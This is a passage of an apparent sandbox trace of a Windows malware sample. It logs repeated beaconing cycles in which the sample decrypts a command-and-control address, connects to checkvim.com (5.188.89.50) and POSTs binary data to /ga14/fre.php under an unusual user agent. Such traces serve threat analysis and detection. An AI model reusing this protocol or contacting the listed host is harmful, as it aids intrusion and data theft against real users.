66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0223.917] GetProcessHeap () returned 0x840000 [0223.917] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0223.917] GetProcessHeap () returned 0x840000 [0223.917] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0223.918] send (s=0x2e0, buf=0x873a58*, len=237, flags=0) returned 237 [0223.919] send (s=0x2e0, buf=0x87eb58*, len=159, flags=0) returned 159 [0223.919] GetProcessHeap () returned 0x840000 [0223.919] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0223.919] recv (in: s=0x2e0, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0224.276] GetProcessHeap () returned 0x840000 [0224.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0224.277] GetProcessHeap () returned 0x840000 [0224.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0224.277] GetProcessHeap () returned 0x840000 [0224.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0224.277] GetProcessHeap () returned 0x840000 [0224.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0224.277] closesocket (s=0x2e0) returned 0 [0224.277] GetProcessHeap () returned 0x840000 [0224.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0224.277] GetProcessHeap () returned 0x840000 [0224.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0224.277] GetProcessHeap () returned 0x840000 [0224.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0224.277] GetProcessHeap () returned 0x840000 [0224.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0224.278] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x5c4) returned 0x2e0 [0224.279] Sleep (dwMilliseconds=0xea60) [0224.280] GetProcessHeap () returned 0x840000 [0224.281] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0224.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.282] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0224.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.298] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0224.309] GetProcessHeap () returned 0x840000 [0224.309] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0224.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.311] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0224.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.312] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0224.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.313] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.313] GetProcessHeap () returned 0x840000 [0224.313] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0224.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.314] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0224.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.316] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0224.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.321] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0224.321] GetProcessHeap () returned 0x840000 [0224.321] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0224.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.322] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.323] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.324] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.326] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.326] GetProcessHeap () returned 0x840000 [0224.326] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0224.326] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0224.326] GetProcessHeap () returned 0x840000 [0224.326] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0224.326] GetProcessHeap () returned 0x840000 [0224.326] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0224.326] GetProcessHeap () returned 0x840000 [0224.326] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0224.326] GetProcessHeap () returned 0x840000 [0224.326] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0224.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.327] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0224.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.348] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0224.356] GetProcessHeap () returned 0x840000 [0224.356] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0224.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.357] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0224.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.358] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0224.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.359] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.359] GetProcessHeap () returned 0x840000 [0224.359] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0224.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.360] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0224.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.362] CryptDestroyKey (hKey=0x87e270) returned 1 [0224.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.363] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0224.363] GetProcessHeap () returned 0x840000 [0224.363] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0224.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.364] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0224.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.365] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0224.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.366] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0224.366] GetProcessHeap () returned 0x840000 [0224.366] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0224.366] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0224.368] GetProcessHeap () returned 0x840000 [0224.368] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0224.368] socket (af=2, type=1, protocol=6) returned 0x2e4 [0224.368] connect (s=0x2e4, name=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0224.437] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0224.437] GetProcessHeap () returned 0x840000 [0224.437] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f930 [0224.437] GetProcessHeap () returned 0x840000 [0224.437] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0224.439] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0224.439] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0224.440] GetProcessHeap () returned 0x840000 [0224.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0224.440] GetProcessHeap () returned 0x840000 [0224.440] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0224.440] GetProcessHeap () returned 0x840000 [0224.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f950 [0224.440] GetProcessHeap () returned 0x840000 [0224.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0224.441] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0224.442] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0224.442] GetProcessHeap () returned 0x840000 [0224.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0224.442] GetProcessHeap () returned 0x840000 [0224.442] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0224.442] send (s=0x2e4, buf=0x873a58*, len=237, flags=0) returned 237 [0224.442] send (s=0x2e4, buf=0x87eb58*, len=159, flags=0) returned 159 [0224.443] GetProcessHeap () returned 0x840000 [0224.443] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0224.443] recv (in: s=0x2e4, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0224.822] GetProcessHeap () returned 0x840000 [0224.822] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0224.822] GetProcessHeap () returned 0x840000 [0224.822] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0224.822] GetProcessHeap () returned 0x840000 [0224.822] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0224.822] GetProcessHeap () returned 0x840000 [0224.822] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f930 | out: hHeap=0x840000) returned 1 [0224.822] closesocket (s=0x2e4) returned 0 [0224.822] GetProcessHeap () returned 0x840000 [0224.823] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0224.823] GetProcessHeap () returned 0x840000 [0224.823] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0224.823] GetProcessHeap () returned 0x840000 [0224.823] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0224.823] GetProcessHeap () returned 0x840000 [0224.823] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0224.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1c4) returned 0x2e4 [0224.827] Sleep (dwMilliseconds=0xea60) [0224.828] GetProcessHeap () returned 0x840000 [0224.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0224.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.830] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0224.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.850] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0224.859] GetProcessHeap () returned 0x840000 [0224.859] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0224.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.861] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0224.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.862] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0224.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.863] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.863] GetProcessHeap () returned 0x840000 [0224.863] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0224.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.865] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0224.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.866] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0224.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.867] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0224.867] GetProcessHeap () returned 0x840000 [0224.867] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0224.868] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.872] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.874] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.876] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.877] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.877] GetProcessHeap () returned 0x840000 [0224.877] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871240 [0224.877] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0224.878] GetProcessHeap () returned 0x840000 [0224.878] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871240 | out: hHeap=0x840000) returned 1 [0224.878] GetProcessHeap () returned 0x840000 [0224.878] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0224.878] GetProcessHeap () returned 0x840000 [0224.878] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0224.878] GetProcessHeap () returned 0x840000 [0224.878] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0224.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.879] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0224.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.887] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0224.894] GetProcessHeap () returned 0x840000 [0224.894] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0224.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.896] CryptImportKey (in: hProv=0x86f798, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0224.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.897] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0224.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.898] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.898] GetProcessHeap () returned 0x840000 [0224.898] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0224.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.899] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0224.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.900] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0224.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0224.901] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0224.901] GetProcessHeap () returned 0x840000 [0224.901] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0224.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.902] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0224.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.903] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0224.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.904] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0224.904] GetProcessHeap () returned 0x840000 [0224.904] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0224.904] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0224.906] GetProcessHeap () returned 0x840000 [0224.906] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0224.906] socket (af=2, type=1, protocol=6) returned 0x2e8 [0224.906] connect (s=0x2e8, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0224.983] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0224.983] GetProcessHeap () returned 0x840000 [0224.984] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0224.984] GetProcessHeap () returned 0x840000 [0224.984] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0224.984] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0224.985] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0224.985] GetProcessHeap () returned 0x840000 [0224.985] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0224.985] GetProcessHeap () returned 0x840000 [0224.985] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0224.985] GetProcessHeap () returned 0x840000 [0224.985] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0224.985] GetProcessHeap () returned 0x840000 [0224.985] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0224.986] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0224.987] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0224.987] GetProcessHeap () returned 0x840000 [0224.987] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0224.987] GetProcessHeap () returned 0x840000 [0224.987] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0224.987] send (s=0x2e8, buf=0x873a58*, len=237, flags=0) returned 237 [0224.988] send (s=0x2e8, buf=0x87eb58*, len=159, flags=0) returned 159 [0224.988] GetProcessHeap () returned 0x840000 [0224.988] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0224.988] recv (in: s=0x2e8, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0225.349] GetProcessHeap () returned 0x840000 [0225.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0225.349] GetProcessHeap () returned 0x840000 [0225.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0225.349] GetProcessHeap () returned 0x840000 [0225.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0225.349] GetProcessHeap () returned 0x840000 [0225.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0225.349] closesocket (s=0x2e8) returned 0 [0225.350] GetProcessHeap () returned 0x840000 [0225.350] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0225.350] GetProcessHeap () returned 0x840000 [0225.350] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0225.350] GetProcessHeap () returned 